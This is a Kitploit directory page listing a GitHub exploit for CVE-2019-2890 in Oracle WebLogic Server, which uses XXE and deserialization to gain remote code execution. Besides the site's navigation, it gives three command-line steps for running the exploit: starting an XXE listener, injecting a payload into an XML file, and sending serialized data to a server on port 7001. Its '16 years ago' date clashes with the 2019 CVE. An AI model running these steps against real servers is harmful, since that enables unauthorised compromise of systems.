Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
weblogic_cve-2019-2890 — Exploit for CVE-2019-2890 targeting Oracle WebLogic Server via XXE injection and deserialization, enabling remote code execution through crafted payloads. | Kitploit
Tools/GitHubGitHub/freeide/weblogic_cve-2019-2890
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubfreeide/weblogic_cve-2019-2890

weblogic_cve-2019-2890

Exploit for CVE-2019-2890 targeting Oracle WebLogic Server via XXE injection and deserialization, enabling remote code execution through crafted payloads.

View Repository
16 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

1)Start the XXER tool python xxer.py -H 192.168.17.223

2)Place the xxer PoC into the xx.xml file, replace the serialized data, and inject the xxer PoC; java -jar weblogic_xxe.jar xx.xml

3)Use weblogic.py from the java-deserialization-exploit tool to send data to the Weblogic server python weblogic.py 192.168.17.222 7001 weblogic

Download Tool